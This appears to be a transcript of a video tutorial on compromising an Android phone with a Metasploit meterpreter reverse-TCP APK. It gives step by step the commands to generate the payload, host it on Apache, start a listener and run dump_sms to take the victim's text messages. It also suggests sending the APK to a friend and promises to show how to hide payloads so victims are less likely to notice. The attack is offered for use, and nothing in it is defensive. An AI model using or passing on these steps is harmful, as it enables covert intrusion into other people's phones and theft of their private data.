Howdy friends, how are you? In this video, I will be teaching you guys how you can hack the Android device using the Metasploit framework via Android Meterpreter Reverse TCP. So without wasting any time, I will be telling you that you have to open any Linux distro. In this case, I am using Parrot OS. So now you have to click on this menu and click root and click on this root terminal. Now put your password and it will open the terminal. Okay, full screen it. Now what you have to do is you have to run a command called ifconfig. In this way you can watch your IP address. In my case it is 192.168.29.104. Okay, now you can just copy it and you can clear the terminal. Done. Now you have to run a command called msf venom -p android meterpreter reverse _tcp lhost. Now in this lhost section you have to paste your IP address which you have copied. Now click space. Now type lport, which is always 4444. It is 4 times 4. Now or .var .www /html and sorry. Now you have to give a name to the payload. Now what is this payload? Friends, in the world of hacking there is called exploitation, and in the Metasploit framework exploitation can be defined as to take the advantage of a system's vulnerability. That means, for example, let us understand this with an example. Let's suppose a thief wants to steal a house. Now the thief will first analyze the house. What are its weaknesses? For example, if he finds that the window is broken, that means the window of the house is vulnerable. That means it is a loophole. So he will make a plan to go through the window and loot the house. In the similar way, you can create a payload and the exploitation process will plant that payload into the system. So I will name my payload as demo.apk. Remember, payload is always apk in case you are going to hack Android device. Now hit enter. So this will generate the payload in a few seconds, I guess. Yeah, done. Now what you have to do is start Apache service Apache to start. This will start the Apache 2 service in your PC, and you can use the local network to access this service. Now if you want to check its status, type in as service Apache 2 status. So you can see it is active and running. Now you can control C. Now what you have to do is type msf console. Okay, this will start the Metasploit framework. Okay, it is started. Now friends, you have to type use multi handler. Now set payload android meter reverse TCP. Now show options. As you can see, our lhost is not set, so we have to set it. Click lhost. Oh, sorry. Set lhost. Now you have to paste your IP address here. So let me paste it. I remember what is, so I was typing, but for sake of convenience, let me paste it. So it is done. Now you have to set port. It is already set, but for sake of convenience, let me again set it. Now it is done. Now you have to at last type exploit. Now what you have to do is go to your Android device, or you can send this payload to your friend's mobile device. So I will be uh, becoming the victim by myself to show you in a easy way. So friends, you have to open Google Chrome or any other browser and type here your IP address, which is 192.168.29.104 in my case, and type slash. Now you have to put the name of the payload, which is demo.apk in my case, and you can see it has downloaded that file. Click on open and install it. Install anyway and hit open. You can see all the permissions are granted by default. Click continue and you can see. So as you can see guys, we have opened another MeterPreter session. So I will show you guys a command called dump SMS. So you can see all the SMSs from the device which is exploited are saved to my computer. In the similar way, you can run all the above commands, but for that you need a app with a user interface. As you can see, the payload we installed in the Android device is without any UI, so it is hard to run all these commands without any user interface. So in the next video I will be telling you guys how you can embed any payload in any type of APK file, so that there are less chances of being caught by the victim and you can easily access all these commands. So thanks for now watching the video.